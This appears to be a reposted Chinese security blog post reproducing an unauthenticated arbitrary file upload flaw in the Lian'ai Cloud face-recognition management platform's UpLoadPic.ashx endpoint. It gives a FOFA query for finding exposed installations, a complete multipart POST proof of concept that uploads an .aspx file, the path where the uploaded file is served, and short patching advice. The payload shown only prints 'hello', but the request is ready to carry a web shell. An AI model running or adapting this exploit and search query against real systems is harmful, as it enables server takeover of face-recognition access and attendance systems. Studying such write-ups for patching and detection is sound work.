漏洞复现 | 特脸爱云管理系统UpLoadPic任意文件上传漏洞【附poc】

admin 2024年5月14日00:30:32评论86 views字数 1196阅读3分59秒阅读模式

一、漏洞简述

脸爱云一脸通智慧管理平台是一套功能强大、运行稳定、操作简单方便、用户界面美观的一脸通系统。该平台整合了人脸识别技术和智能化解决方案,可以实现识别和管理个体身份,为各种场景提供便捷的身份验证和管理功能。脸爱云一脸通智慧管理平台无需安装,只需在后台配置即可在浏览器登录,可以轻松统计数据,并在安防、门禁、考勤等领域发挥重要作用,提升管理效率和安全性。UpLoadPic.ashx接口存在任意文件上传漏洞,导致未经身份认证的恶意攻击者可以通过此漏洞构造参数上传文件,进而控制服务器系统。

漏洞复现 | 特脸爱云管理系统UpLoadPic任意文件上传漏洞【附poc】

二、网络测绘

fofa:title=="欢迎使用脸爱云 一脸通智慧管理平台"

三、漏洞复现

测试上传aspx文件

漏洞复现 | 特脸爱云管理系统UpLoadPic任意文件上传漏洞【附poc】

访问/images/b6b1c1823d354e9cbe98b04fe65d0d2d1.aspx

漏洞复现 | 特脸爱云管理系统UpLoadPic任意文件上传漏洞【附poc】

四、漏洞检测poc

POST /UpLoadPic.ashx HTTP/1.1Host: 0.0.0.0User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywt7cEu1eBdibB13uX-Requested-With: XMLHttpRequestContent-Length: 417

Connection: close------WebKitFormBoundarywt7cEu1eBdibB13uContent-Disposition: form-data; name="action"

post------WebKitFormBoundarywt7cEu1eBdibB13uContent-Disposition: form-data; name="myPhoto"; filename="1.aspx"Content-Type: image/png

<% response.write("hello") %>------WebKitFormBoundarywt7cEu1eBdibB13uContent-Disposition: form-data; name="oldName"

------WebKitFormBoundarywt7cEu1eBdibB13u--

五、漏洞修复

1、建议联系厂商打补丁或升级版本。

2、增加Web应用防火墙防护。

3、关闭互联网暴露面或接口设置访问权限。

原文始发于微信公众号(实战安全研究):漏洞复现 | 特脸爱云管理系统UpLoadPic任意文件上传漏洞【附poc】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月14日00:30:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 | 特脸爱云管理系统UpLoadPic任意文件上传漏洞【附poc】https://cn-sec.com/archives/2735222.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息